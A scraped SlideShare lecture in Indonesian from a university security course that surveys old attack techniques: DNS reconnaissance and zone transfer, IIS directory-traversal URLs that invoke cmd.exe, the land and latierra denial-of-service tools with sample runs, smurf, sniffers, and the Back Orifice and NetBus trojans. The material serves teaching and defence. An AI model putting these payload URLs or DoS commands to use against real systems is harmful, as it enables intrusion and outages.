SlideShare une entreprise Scribd logo
1  sur  27
Agus Santosa, ST.
                       Universitas Majalengka
  Sumber : (Budi Raharjo, PT Insan Infonesia -
Bandung & PT INDOCISC – Jakarta 1998-2005)
Dalam pertemuan ini akan dibahas beberapa
  contoh eksploitasi lubang keamanan.
Contoh-contoh yang dibahas ada yan bersifat
  umum dan ada yang bersifat khusus untuk
  satu jenis operating system tertentu, atau
  untuk program tertentu dengan versi
  tertentu.
Biasanya lubang keamanan ini sudah ditutup
  pada versi baru dari paket program tersebut
  sehingga mungkin tidak dapat anda coba
1. Mencari informasi
2. Eksploitasi Web Server
3. Denial of Service Attack
4. Sniffer
5. Trojan Horse
Sebelum melakukan penyerangan, seorang
  cracker biasanya mencari informasi tentang
  targetnya=DNS (Domain Name System) :
a. whois, host, nslookup, dig (tools di sistem
    UNIX)
b. Sam Spade (tools di sistem Windows)
c. web dari Network Solutions inc. Yang
    menyediakan informasi tentang data-data
    gTLD (.com, .net, .org, dan seterusnya)
    melalui webnya di
    http://www.networksolutions.com
a. whois, host, nslookup, dig
 Untuk mencari name server, dapat digunakan
  program “host” dengan option “-t ns”
 Contoh :
 unix$ host -t ns yahoo.com
 yahoo.com NS          NS3.EUROPE.yahoo.com
 yahoo.com NS          NS1.yahoo.com
 yahoo.com NS          NS5.DCX.yahoo.com
 Untuk mencari nomor IP dari sebuah
 host, langsung gunakan program host tanpa
 option.
 Contoh :
 unix$ host ns1.yahoo.com
 ns1.yahoo.com A      204.71.200.33
a. Whois, host, nslookup, dig (lanjutan)
unix$ whois -h whois.networksolutions.com yahoo.com
Registrant:
Yahoo (YAHOO-DOM)
3420 Central Expressway
Santa Clara, CA 95051
US
Domain Name: YAHOO.COM
Administrative Contact, Technical Contact:
Balling, Derek (DJB470) tech-contact@YAHOO-INC.COM
Yahoo!
701 First Ave
Sunnyvale, CA 94089
US
+1-408-349-5062
Billing Contact:
Billing, Domain (DB28833) domainbilling@YAHOO-INC.COM
Yahoo! Inc.
225 Broadway, 13th Floor
San Diego, CA 92101
1-408-731-3300
Record last updated on 28-Jun-2001.
Record expires on 20-Jan-2010.
Record created on 18-Jan-1995.
Database last updated on 20-Jul-2001 00:12:00 EDT.
Domain servers in listed order:
NS1.YAHOO.COM                          204.71.200.33
NS5.DCX.YAHOO.COM                      216.32.74.10
NS3.EUROPE.YAHOO.COM                   217.12.4.71
a. Whois, host, nslookup, dig (lanjutan)
Untuk mengambil (dump) semua data-data
DNS yang dikenal dengan istilah zone
transfer dengan menggunakan program
“dig”
unix$ dig yahoo.com. axfr @ns1.yahoo.com.

Contoh di atas adalah perintah untuk
melakukan zone transfer (axfr)
terhadap domain yahoo.com dari server
ns1.yahoo.com.
b. Sam Spade (tools di sistem Windows)




                            Program ini dapat
                            diperoleh secara gratis
                            dari web
                            http://www.samspade.org
                            .




c. web dari Network Solutions inc.
http://www.networksolutions.com
Web server menyediakan jasa untuk publik.
 Dengan demikian dia harus berada di depan
 publik.
Defacing Microsoft IIS: Salah satu lubang
 keamanan dari web yang berbasis IIS adalah
 adanya program atau script yang kurang baik
 implementasinya. Sebagai contoh, bugtraq id
 1806 menujukkan cara untuk melihat isi
 direktori dari sebuah web server yang
 berbasis IIS.
Informasi lengkapnya ada di http://
   www.securityfocus.com/bid/1806

http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
“Denial of Service (DoS) attack” merupakan
  sebuah usaha (dalam bentuk serangan) untuk
  melumpuhkan sistem yang dijadikan target
  sehingga sistem tersebut tidak dapat
  menyediakan servis-servisnya (denial of
  service) atau tingkat servis menurun dengan
  drastis.
Cara untuk melumpuhkan dapat bermacam-
  macam dan akibatnyapun dapat beragam.
Sistem yang diserang dapat menjadi “bengong”
  (hang, crash), tidak berfungsi, atau turun
  kinerjanya (beban CPU tinggi).
 Land  attack
Land attack merupakan serangan kepada
  sistem dengan menggunakan program yang
  bernama “land”
 unix# ./land 192.168.1.1 139
 land.c by m3lt, FLC
 192.168.1.1:139 landed
 Latierra
Program latierra merupakan “perbaikan” dari
  program land, dimana port yang digunakan
  berubah-ubah sehingga menyulitkan bagi
  pengamanan.
latierra v1.0b by MondoMan               -p protocol = ~6=tcp, 17=udp, use -p
    (elmondo@usa.net), KeG                   option for complete list
Enhanced version of land.c originally -w window_size = value from 0 to
    developed by m3lt, FLC                   ?, default=65000
Arguments:                               -q
* -i dest_ip = destination ip address        tcp_sequence_number, default=386
    such as 1.1.1.1                          8
If last octet is '-', then the address   -m message_type
    will increment                       (~0=none, 1=Out-Of-
from 1 to 254 (Class C) on the next          Band, 4=Msg_DontRoute
    loop                                 -s seconds = delay between port
and loop must be > 1 or -5 (forever).        numbers, default=1
Alternatives = zone=filename.txt or -o 1 = supress additional output to
    list=filename.txt                        screen, default=0
(ASCII) For list of alternative options, -l loop = times to loop through
                                             ports/scan, default=1,
use -a instead of -h.
                                         -5=forever
* -b port# = beginning port number
    (required).                          * = required ~ = default parameter
                                             values
-e port# = ending port number
    (optional)
-t = tcp flag options
    (f=fin, ~s=syn, r=reset, ~p=push, a=
    ack,
u=urgent)
-v = time_to_live value, default=255
unix# ./latierra -i     (-b) Beginning Port #:
  192.167.1.1 -b 139   - 139
  e 141                 (-e) Ending Port # : 141
latierra v1.0b by       (-s) Seconds to Pause: 1
  MondoMan              (-l) Loop : 1
  (elmondo@usa.net),
                        (-w) Window size :
  KeG
                          65000
Enhanced version of
                        (-q) Sequence Number
  land.c originally
                          : F1C (3868)
  developed by
  m3lt, FLC             (-v) Time-to-Live : 255
Settings:               (-p) IP Protocol # : 6
(-i) Dest. IP Addr :    (-t) TCP flags : syn push
  192.168.1.1           Done.
 Ping-o-death
Ping-o-death sebetulnya adalah eksploitasi
  program ping dengan memberikan packet
  yang ukurannya besar ke sistem yang dituju.
Beberapa sistem UNIX ternyata menjadi hang
  ketika diserang dengan cara ini.
Program ping umum terdapat di berbagai
  operating system, meskipun umumnya
  program ping tersebut mengirimkan packet
  dengan ukuran kecil (tertentu) dan tidak
  memiliki fasilitas untuk mengubah besarnya
  packet.
 Ping broadcast (smurf)
 Ping broadcast (smurf)
Salah satu mekanisme serangan yang baru-baru
  ini mulai marak digunakan adalah
  menggunakan ping ke alamat broadcast, ini
  yang sering disebut dengan smurf.
Seluruh komputer (device) yang berada di
  alamat broadcast tersebut akan menjawab
Jika sebuah sistem memiliki banyak komputer
  (device) dan ping broadcast ini dilakukan
  terus menerus, jaringan dapat dipenuhi oleh
  respon-respon dari device-device tersebut.
  Akibatnya jaringan menjadi lambat.
$ ping 192.168.1.255
PING 192.168.1.255 (192.168.1.255): 56 data bytes
64 bytes from 192.168.1.4: icmp_seq=0 ttl=64 time=2.6 ms
64 bytes from 192.168.1.2: icmp_seq=0 ttl=255 time=24.0 ms
(DUP!)
64 bytes from 192.168.1.4: icmp_seq=1 ttl=64 time=2.5 ms
64 bytes from 192.168.1.2: icmp_seq=1 ttl=255 time=4.7 ms
(DUP!)
64 bytes from 192.168.1.4: icmp_seq=2 ttl=64 time=2.5 ms
64 bytes from 192.168.1.2: icmp_seq=2 ttl=255 time=4.7 ms
(DUP!)
64 bytes from 192.168.1.4: icmp_seq=3 ttl=64 time=2.5 ms
64 bytes from 192.168.1.2: icmp_seq=3 ttl=255 time=4.7 ms
(DUP!)
--- 192.168.1.255 ping statistics ---
4 packets transmitted, 4 packets received, +4 duplicates, 0%
packet loss
round-trip min/avg/max = 2.5/6.0/24.0 ms
Program sniffer adalah program yang dapat
  digunakan untuk menyadap data dan
  informasi melalui jaringan komputer.
Di tangan seorang admin, program sniffer
  sangat bermanfaat untuk mencari (debug)
  kesalahan di jaringan atau untuk memantau
  adanya serangan.
 Sniffit
Program sniffit dijalankan dengan userid root
  (atau program dapat di-setuid root sehingga
  dapat dijalankan oleh siapa saja) dan dapat
  menyadap data.
 Tcpdump
Program tcpdump merupakan program gratis
  yang umum digunakan untuk menangkap
  paket di sistem UNIX. Implementasi untuk
  sistem Window juga tersedia dengan nama
  windump.
unix# tcpdump                                 06:46:39.028893 192.168.1.7 > 192.168.1.1: icmp:
                                                  echo request
06:46:31.318893 192.168.1.7.1043 >
    192.168.1.1.80: S                         06:46:39.028893 192.168.1.1 > 192.168.1.7: icmp:
                                                  echo reply
616175183:616175183(0) win 5840 <mss
    1460,nop,nop,sackOK> (DF)                 06:46:40.028893 192.168.1.7 > 192.168.1.1: icmp:
                                                  echo request
06:46:31.318893 192.168.1.1.80 >
    192.168.1.7.1043: S                       06:46:40.028893 192.168.1.1 > 192.168.1.7: icmp:
                                                  echo reply
1312015909:1312015909(0) ack 616175184 win
    32736 <mss 1460>                          06:46:41.028893 192.168.1.7 > 192.168.1.1: icmp:
                                                  echo request
06:46:31.318893 192.168.1.7.1043 >
    192.168.1.1.80: . ack 1 win               06:46:41.028893 192.168.1.1 > 192.168.1.7: icmp:
                                                  echo reply
5840 (DF)
                                              06:46:42.038893 192.168.1.7 > 192.168.1.1: icmp:
06:46:31.318893 192.168.1.7.1043 >                echo request
    192.168.1.1.80: P
                                              06:46:42.038893 192.168.1.1 > 192.168.1.7: icmp:
1:296(295) ack 1 win 5840 (DF)                    echo reply
06:46:31.338893 192.168.1.1.80 >              06:46:44.048893 192.168.1.7.1043 >
    192.168.1.7.1043: . ack 296                   192.168.1.1.80: P
win 32441 (DF)                                296:591(295) ack 200 win 5641 (DF)
06:46:31.738893 192.168.1.1.80 >              06:46:44.048893 192.168.1.1.80 >
    192.168.1.7.1043: P                           192.168.1.7.1043: P
1:200(199) ack 296 win 32736 (DF)             200:398(198) ack 591 win 32736 (DF)
06:46:31.868893 192.168.1.7.1043 >            06:46:44.168893 192.168.1.7.1043 >
    192.168.1.1.80: . ack 200                     192.168.1.1.80: . ack 398
win 5641 (DF)                                 win 5443 (DF)
06:46:31.898893 192.168.1.1.1492 >
    192.168.1.7.113: S
2035772989:2035772989(0) win 512 <mss 1460>
06:46:31.898893 192.168.1.7.113 >
    192.168.1.1.1492: R 0:0(0)
ack 2035772990 win 0
 Sniffer Pro
Sniffer Pro merupakan program sniffer komersial
  yang berjalan di sistem Windows. Program ini
  dibuat oleh Network Associates dan cukup
  lengkap fasilitasnya. Sniffer Pro dapat
  menangkap packet dengan aturan-aturan (rules)
  tertentu. Bahkan dia dilengkapi dengan
  visualisasi yang sangat menarik dan membantu
  administrator.
 Anti Sniffer
Untuk menutup lubang keamanan dari kegiatan
  sniffing, administrator dapat membuat
  jaringannya bersegmen dan menggunakan
  perangkat switch sebagai pengganti hub biasa.
  Selain itu dapat juga digunakan program untuk
  mendeteksi adanya penggunaan sniffer di
  jaringan yang dikelolanya. Program pendeteksi
  sniffer ini disebut anti-sniffer.
Trojan horse di sistem komputer adalah
  program yang disisipkan tanpa pengetahuan
  si pemilik komputer. Trojan horse ini
  kemudian dapat diaktifkan dan dikendalikan
  dari jarak jauh, atau dengan menggunakan
  timer (pewaktu). Akibatnya, komputer yang
  disisipi trojan horse tersebut dapat
  dikendalikan dari jarak jauh.
 Back Orifice (BO)
 Mendeteksi BO
 NetBus
Back Orifice (BO) merupakan trojan horse
  untuk sistem yang menggunakan operating
  system Windows (95, 98, NT, 2000). BO
  Merupakan produk dari Cult of the Dead
  Cow, pertama kali dikeluarkan 3 Agustus 1998
  dan sangat populer di kalangan bawah tanah.
  Pada saat dokumen ini ditulis, telah keluar
  BO 2000 untuk sistem operasi Windows 2000
 Mendeteksi BO
Gunakan program "REGEDIT" dan cari
 HKEY_LOCAL_MACHINESOFTWAREMicrosoft
 WindowsCurrentVersionRunServices




 Sumber informasi tentang BO dapat diperoleh dari
 •http://www.nwi.net/~pchelp/bo/bo.html
 •http://www.bo2k.com
 •http://www.iss.net/xforce/alerts/advise5.html
 NetBus
NetBus merupakan trojan horse yang mirip
 Back Orifice. NetBus dapat digunakan untuk
 mengelola komputer Windows 95/98/NT dari
 jarak jauh untuk mengakses data dan fungsi
 dari komputer tersebut.
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun




                                      Informasi mengenai
                                        NetBus dapat diperoleh
                                        di
                                        http://www.netbus.org
Metodologi dari penyusup “Hacking Exposed”
 Target acquisition and information gaterhing
 Initial access
 Privilege escalation
 Covering tracks
SEE YOU
NEXT WEEK

Contenu connexe

Tendances

Lks it networking support konfigurasi dmz port forwarding di debian
Lks it networking support  konfigurasi dmz port forwarding di debianLks it networking support  konfigurasi dmz port forwarding di debian
Lks it networking support konfigurasi dmz port forwarding di debianHamami InkaZo
 
Write up idsecconf2015 online ctf
Write up idsecconf2015 online ctfWrite up idsecconf2015 online ctf
Write up idsecconf2015 online ctfidsecconf
 
Jaringan komputer
Jaringan komputerJaringan komputer
Jaringan komputerAri FX
 
Denny nmap
Denny nmapDenny nmap
Denny nmapatlez
 
Instalasi dan Konfigurasi DNS #1
Instalasi dan Konfigurasi DNS #1Instalasi dan Konfigurasi DNS #1
Instalasi dan Konfigurasi DNS #1David Suhendrik
 

Tendances (8)

Laporan Pendahuluan Firewall
Laporan Pendahuluan FirewallLaporan Pendahuluan Firewall
Laporan Pendahuluan Firewall
 
Lks it networking support konfigurasi dmz port forwarding di debian
Lks it networking support  konfigurasi dmz port forwarding di debianLks it networking support  konfigurasi dmz port forwarding di debian
Lks it networking support konfigurasi dmz port forwarding di debian
 
Laporan Keamanan Jaringan Snort IDS
Laporan Keamanan Jaringan Snort IDSLaporan Keamanan Jaringan Snort IDS
Laporan Keamanan Jaringan Snort IDS
 
Write up idsecconf2015 online ctf
Write up idsecconf2015 online ctfWrite up idsecconf2015 online ctf
Write up idsecconf2015 online ctf
 
Jaringan komputer
Jaringan komputerJaringan komputer
Jaringan komputer
 
Laporan Keamanan Jaringan Hostbased
Laporan Keamanan Jaringan HostbasedLaporan Keamanan Jaringan Hostbased
Laporan Keamanan Jaringan Hostbased
 
Denny nmap
Denny nmapDenny nmap
Denny nmap
 
Instalasi dan Konfigurasi DNS #1
Instalasi dan Konfigurasi DNS #1Instalasi dan Konfigurasi DNS #1
Instalasi dan Konfigurasi DNS #1
 

En vedette

Brain slideshow
Brain slideshowBrain slideshow
Brain slideshowladricaj
 
Sepa Migration Day Byron Soulopoulos
Sepa Migration Day Byron SoulopoulosSepa Migration Day Byron Soulopoulos
Sepa Migration Day Byron SoulopoulosByron Soulopoulos
 
The effect of number of concepts on readability of schemas 2
The effect of number of concepts on readability of schemas 2The effect of number of concepts on readability of schemas 2
The effect of number of concepts on readability of schemas 2Saman Sara
 
Why I Love Driving Electric - Tesla Club Belgium
Why I Love Driving Electric - Tesla Club Belgium Why I Love Driving Electric - Tesla Club Belgium
Why I Love Driving Electric - Tesla Club Belgium Byron Soulopoulos
 
National Bank of Belgium NBB Infosession for ERP
National Bank of Belgium NBB Infosession for ERPNational Bank of Belgium NBB Infosession for ERP
National Bank of Belgium NBB Infosession for ERPByron Soulopoulos
 
East b’s happiness project
East b’s happiness projectEast b’s happiness project
East b’s happiness projectkaybem316
 
Tesla Model S Mobile Apps, The iPad on wheels and the next "Teslanaires"
Tesla Model S Mobile Apps, The iPad on wheels and the next "Teslanaires"Tesla Model S Mobile Apps, The iPad on wheels and the next "Teslanaires"
Tesla Model S Mobile Apps, The iPad on wheels and the next "Teslanaires"Byron Soulopoulos
 
The need for security
The need for securityThe need for security
The need for securitySaman Sara
 
Reinado de la fantasia
Reinado de la fantasiaReinado de la fantasia
Reinado de la fantasiaemirab
 
Unit 43 as1 tutor p1
Unit 43 as1 tutor p1Unit 43 as1 tutor p1
Unit 43 as1 tutor p1btectutor
 
Purpose Driven Marketing
Purpose Driven MarketingPurpose Driven Marketing
Purpose Driven MarketingSaman Sara
 
Transgender employees
Transgender employeesTransgender employees
Transgender employeesSaman Sara
 
International Public Relations
International Public RelationsInternational Public Relations
International Public RelationsJosh Turner
 
Presenting Tesla Model S, the smartest car on earth (+ Tesla Auto Pilot)
Presenting Tesla Model S, the smartest car on earth (+ Tesla Auto Pilot)Presenting Tesla Model S, the smartest car on earth (+ Tesla Auto Pilot)
Presenting Tesla Model S, the smartest car on earth (+ Tesla Auto Pilot)Byron Soulopoulos
 
Panduan pelaksanaan tes ujian praktek
Panduan pelaksanaan tes ujian praktekPanduan pelaksanaan tes ujian praktek
Panduan pelaksanaan tes ujian praktekAgung Mzl
 

En vedette (19)

Question 3
Question 3Question 3
Question 3
 
Brain slideshow
Brain slideshowBrain slideshow
Brain slideshow
 
Sepa Migration Day Byron Soulopoulos
Sepa Migration Day Byron SoulopoulosSepa Migration Day Byron Soulopoulos
Sepa Migration Day Byron Soulopoulos
 
The effect of number of concepts on readability of schemas 2
The effect of number of concepts on readability of schemas 2The effect of number of concepts on readability of schemas 2
The effect of number of concepts on readability of schemas 2
 
Soal instrument 25
Soal instrument 25Soal instrument 25
Soal instrument 25
 
Why I Love Driving Electric - Tesla Club Belgium
Why I Love Driving Electric - Tesla Club Belgium Why I Love Driving Electric - Tesla Club Belgium
Why I Love Driving Electric - Tesla Club Belgium
 
Trust in the lord
Trust in the lordTrust in the lord
Trust in the lord
 
National Bank of Belgium NBB Infosession for ERP
National Bank of Belgium NBB Infosession for ERPNational Bank of Belgium NBB Infosession for ERP
National Bank of Belgium NBB Infosession for ERP
 
East b’s happiness project
East b’s happiness projectEast b’s happiness project
East b’s happiness project
 
Tesla Model S Mobile Apps, The iPad on wheels and the next "Teslanaires"
Tesla Model S Mobile Apps, The iPad on wheels and the next "Teslanaires"Tesla Model S Mobile Apps, The iPad on wheels and the next "Teslanaires"
Tesla Model S Mobile Apps, The iPad on wheels and the next "Teslanaires"
 
The need for security
The need for securityThe need for security
The need for security
 
Reinado de la fantasia
Reinado de la fantasiaReinado de la fantasia
Reinado de la fantasia
 
Unit 43 as1 tutor p1
Unit 43 as1 tutor p1Unit 43 as1 tutor p1
Unit 43 as1 tutor p1
 
Purpose Driven Marketing
Purpose Driven MarketingPurpose Driven Marketing
Purpose Driven Marketing
 
Transgender employees
Transgender employeesTransgender employees
Transgender employees
 
International Public Relations
International Public RelationsInternational Public Relations
International Public Relations
 
Presenting Tesla Model S, the smartest car on earth (+ Tesla Auto Pilot)
Presenting Tesla Model S, the smartest car on earth (+ Tesla Auto Pilot)Presenting Tesla Model S, the smartest car on earth (+ Tesla Auto Pilot)
Presenting Tesla Model S, the smartest car on earth (+ Tesla Auto Pilot)
 
Comprensión Lectora
Comprensión Lectora Comprensión Lectora
Comprensión Lectora
 
Panduan pelaksanaan tes ujian praktek
Panduan pelaksanaan tes ujian praktekPanduan pelaksanaan tes ujian praktek
Panduan pelaksanaan tes ujian praktek
 

Similaire à EKSPLOITASI LUBANG KEAMANAN

Praktikum2 komdat_ basic command prompt & sharing file in windows
Praktikum2 komdat_ basic command prompt & sharing file in windowsPraktikum2 komdat_ basic command prompt & sharing file in windows
Praktikum2 komdat_ basic command prompt & sharing file in windowsJefri Fahrian
 
13. download soal latihan kejuruan tkj lengkap full --- www.the-xp.com
13. download soal latihan kejuruan tkj lengkap full  --- www.the-xp.com13. download soal latihan kejuruan tkj lengkap full  --- www.the-xp.com
13. download soal latihan kejuruan tkj lengkap full --- www.the-xp.comDwi Yulianto
 
Laporan resmi
Laporan resmiLaporan resmi
Laporan resminatubakha
 
Konfigurasi router debian 7
Konfigurasi router debian 7Konfigurasi router debian 7
Konfigurasi router debian 7sup4di
 
1. bank soal kejuruan un tkj lengkap 2013 2014 --- www.the-xp.com
1. bank soal kejuruan un tkj lengkap 2013 2014  --- www.the-xp.com1. bank soal kejuruan un tkj lengkap 2013 2014  --- www.the-xp.com
1. bank soal kejuruan un tkj lengkap 2013 2014 --- www.the-xp.comDwi Yulianto
 
Modul network troubleshooting
Modul network troubleshootingModul network troubleshooting
Modul network troubleshootingsuparma
 
Konfigurasi tcp ip
Konfigurasi tcp ipKonfigurasi tcp ip
Konfigurasi tcp ipagungmitnick
 
anak lorong punya materi
anak lorong punya materianak lorong punya materi
anak lorong punya materialbert giban
 
Albert cara connection
Albert cara connection Albert cara connection
Albert cara connection albert giban
 
Attacking The Lan
Attacking The LanAttacking The Lan
Attacking The Lanphanleson
 
Laporan tugas keamanan snort ids
Laporan tugas keamanan snort idsLaporan tugas keamanan snort ids
Laporan tugas keamanan snort idsramasatriaf
 
Try out ujian nasional smk teori kejuruan 2013
Try out  ujian nasional smk teori kejuruan 2013Try out  ujian nasional smk teori kejuruan 2013
Try out ujian nasional smk teori kejuruan 2013mardiyanto83
 
Soal latihanujiannasionalsmktkj2013
Soal latihanujiannasionalsmktkj2013Soal latihanujiannasionalsmktkj2013
Soal latihanujiannasionalsmktkj2013mardiyanto83
 
9.1 gatewae server
9.1 gatewae server9.1 gatewae server
9.1 gatewae serverwayan abyong
 
Laporan praktikum modul 8
Laporan praktikum modul 8Laporan praktikum modul 8
Laporan praktikum modul 8Devi Apriansyah
 
impementasi nts, nslookup, netstat,ipconfig,dns
 impementasi nts, nslookup, netstat,ipconfig,dns impementasi nts, nslookup, netstat,ipconfig,dns
impementasi nts, nslookup, netstat,ipconfig,dnsEnvaPya
 
Modul network troubleshooting
Modul network troubleshootingModul network troubleshooting
Modul network troubleshootingPAMBAH.Corp
 

Similaire à EKSPLOITASI LUBANG KEAMANAN (20)

Praktikum2 komdat_ basic command prompt & sharing file in windows
Praktikum2 komdat_ basic command prompt & sharing file in windowsPraktikum2 komdat_ basic command prompt & sharing file in windows
Praktikum2 komdat_ basic command prompt & sharing file in windows
 
13. download soal latihan kejuruan tkj lengkap full --- www.the-xp.com
13. download soal latihan kejuruan tkj lengkap full  --- www.the-xp.com13. download soal latihan kejuruan tkj lengkap full  --- www.the-xp.com
13. download soal latihan kejuruan tkj lengkap full --- www.the-xp.com
 
Laporan resmi
Laporan resmiLaporan resmi
Laporan resmi
 
Konfigurasi router debian 7
Konfigurasi router debian 7Konfigurasi router debian 7
Konfigurasi router debian 7
 
FreeBSD Basic Setting
FreeBSD Basic SettingFreeBSD Basic Setting
FreeBSD Basic Setting
 
1. bank soal kejuruan un tkj lengkap 2013 2014 --- www.the-xp.com
1. bank soal kejuruan un tkj lengkap 2013 2014  --- www.the-xp.com1. bank soal kejuruan un tkj lengkap 2013 2014  --- www.the-xp.com
1. bank soal kejuruan un tkj lengkap 2013 2014 --- www.the-xp.com
 
Modul network troubleshooting
Modul network troubleshootingModul network troubleshooting
Modul network troubleshooting
 
Konfigurasi tcp ip
Konfigurasi tcp ipKonfigurasi tcp ip
Konfigurasi tcp ip
 
anak lorong punya materi
anak lorong punya materianak lorong punya materi
anak lorong punya materi
 
Albert cara connection
Albert cara connection Albert cara connection
Albert cara connection
 
Attacking The Lan
Attacking The LanAttacking The Lan
Attacking The Lan
 
FreeBSD Installation
FreeBSD InstallationFreeBSD Installation
FreeBSD Installation
 
Laporan tugas keamanan snort ids
Laporan tugas keamanan snort idsLaporan tugas keamanan snort ids
Laporan tugas keamanan snort ids
 
Try out ujian nasional smk teori kejuruan 2013
Try out  ujian nasional smk teori kejuruan 2013Try out  ujian nasional smk teori kejuruan 2013
Try out ujian nasional smk teori kejuruan 2013
 
Soal latihanujiannasionalsmktkj2013
Soal latihanujiannasionalsmktkj2013Soal latihanujiannasionalsmktkj2013
Soal latihanujiannasionalsmktkj2013
 
9.1 gatewae server
9.1 gatewae server9.1 gatewae server
9.1 gatewae server
 
Wide area network
Wide area networkWide area network
Wide area network
 
Laporan praktikum modul 8
Laporan praktikum modul 8Laporan praktikum modul 8
Laporan praktikum modul 8
 
impementasi nts, nslookup, netstat,ipconfig,dns
 impementasi nts, nslookup, netstat,ipconfig,dns impementasi nts, nslookup, netstat,ipconfig,dns
impementasi nts, nslookup, netstat,ipconfig,dns
 
Modul network troubleshooting
Modul network troubleshootingModul network troubleshooting
Modul network troubleshooting
 

EKSPLOITASI LUBANG KEAMANAN

  • 1. Agus Santosa, ST. Universitas Majalengka Sumber : (Budi Raharjo, PT Insan Infonesia - Bandung & PT INDOCISC – Jakarta 1998-2005)
  • 2. Dalam pertemuan ini akan dibahas beberapa contoh eksploitasi lubang keamanan. Contoh-contoh yang dibahas ada yan bersifat umum dan ada yang bersifat khusus untuk satu jenis operating system tertentu, atau untuk program tertentu dengan versi tertentu. Biasanya lubang keamanan ini sudah ditutup pada versi baru dari paket program tersebut sehingga mungkin tidak dapat anda coba
  • 3. 1. Mencari informasi 2. Eksploitasi Web Server 3. Denial of Service Attack 4. Sniffer 5. Trojan Horse
  • 4. Sebelum melakukan penyerangan, seorang cracker biasanya mencari informasi tentang targetnya=DNS (Domain Name System) : a. whois, host, nslookup, dig (tools di sistem UNIX) b. Sam Spade (tools di sistem Windows) c. web dari Network Solutions inc. Yang menyediakan informasi tentang data-data gTLD (.com, .net, .org, dan seterusnya) melalui webnya di http://www.networksolutions.com
  • 5. a. whois, host, nslookup, dig  Untuk mencari name server, dapat digunakan program “host” dengan option “-t ns” Contoh : unix$ host -t ns yahoo.com yahoo.com NS NS3.EUROPE.yahoo.com yahoo.com NS NS1.yahoo.com yahoo.com NS NS5.DCX.yahoo.com  Untuk mencari nomor IP dari sebuah host, langsung gunakan program host tanpa option. Contoh : unix$ host ns1.yahoo.com ns1.yahoo.com A 204.71.200.33
  • 6. a. Whois, host, nslookup, dig (lanjutan) unix$ whois -h whois.networksolutions.com yahoo.com Registrant: Yahoo (YAHOO-DOM) 3420 Central Expressway Santa Clara, CA 95051 US Domain Name: YAHOO.COM Administrative Contact, Technical Contact: Balling, Derek (DJB470) tech-contact@YAHOO-INC.COM Yahoo! 701 First Ave Sunnyvale, CA 94089 US +1-408-349-5062 Billing Contact: Billing, Domain (DB28833) domainbilling@YAHOO-INC.COM Yahoo! Inc. 225 Broadway, 13th Floor San Diego, CA 92101 1-408-731-3300 Record last updated on 28-Jun-2001. Record expires on 20-Jan-2010. Record created on 18-Jan-1995. Database last updated on 20-Jul-2001 00:12:00 EDT. Domain servers in listed order: NS1.YAHOO.COM 204.71.200.33 NS5.DCX.YAHOO.COM 216.32.74.10 NS3.EUROPE.YAHOO.COM 217.12.4.71
  • 7. a. Whois, host, nslookup, dig (lanjutan) Untuk mengambil (dump) semua data-data DNS yang dikenal dengan istilah zone transfer dengan menggunakan program “dig” unix$ dig yahoo.com. axfr @ns1.yahoo.com. Contoh di atas adalah perintah untuk melakukan zone transfer (axfr) terhadap domain yahoo.com dari server ns1.yahoo.com.
  • 8. b. Sam Spade (tools di sistem Windows) Program ini dapat diperoleh secara gratis dari web http://www.samspade.org . c. web dari Network Solutions inc. http://www.networksolutions.com
  • 9. Web server menyediakan jasa untuk publik. Dengan demikian dia harus berada di depan publik. Defacing Microsoft IIS: Salah satu lubang keamanan dari web yang berbasis IIS adalah adanya program atau script yang kurang baik implementasinya. Sebagai contoh, bugtraq id 1806 menujukkan cara untuk melihat isi direktori dari sebuah web server yang berbasis IIS.
  • 10. Informasi lengkapnya ada di http:// www.securityfocus.com/bid/1806 http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
  • 11. “Denial of Service (DoS) attack” merupakan sebuah usaha (dalam bentuk serangan) untuk melumpuhkan sistem yang dijadikan target sehingga sistem tersebut tidak dapat menyediakan servis-servisnya (denial of service) atau tingkat servis menurun dengan drastis. Cara untuk melumpuhkan dapat bermacam- macam dan akibatnyapun dapat beragam. Sistem yang diserang dapat menjadi “bengong” (hang, crash), tidak berfungsi, atau turun kinerjanya (beban CPU tinggi).
  • 12.  Land attack Land attack merupakan serangan kepada sistem dengan menggunakan program yang bernama “land” unix# ./land 192.168.1.1 139 land.c by m3lt, FLC 192.168.1.1:139 landed  Latierra Program latierra merupakan “perbaikan” dari program land, dimana port yang digunakan berubah-ubah sehingga menyulitkan bagi pengamanan.
  • 13. latierra v1.0b by MondoMan -p protocol = ~6=tcp, 17=udp, use -p (elmondo@usa.net), KeG option for complete list Enhanced version of land.c originally -w window_size = value from 0 to developed by m3lt, FLC ?, default=65000 Arguments: -q * -i dest_ip = destination ip address tcp_sequence_number, default=386 such as 1.1.1.1 8 If last octet is '-', then the address -m message_type will increment (~0=none, 1=Out-Of- from 1 to 254 (Class C) on the next Band, 4=Msg_DontRoute loop -s seconds = delay between port and loop must be > 1 or -5 (forever). numbers, default=1 Alternatives = zone=filename.txt or -o 1 = supress additional output to list=filename.txt screen, default=0 (ASCII) For list of alternative options, -l loop = times to loop through ports/scan, default=1, use -a instead of -h. -5=forever * -b port# = beginning port number (required). * = required ~ = default parameter values -e port# = ending port number (optional) -t = tcp flag options (f=fin, ~s=syn, r=reset, ~p=push, a= ack, u=urgent) -v = time_to_live value, default=255
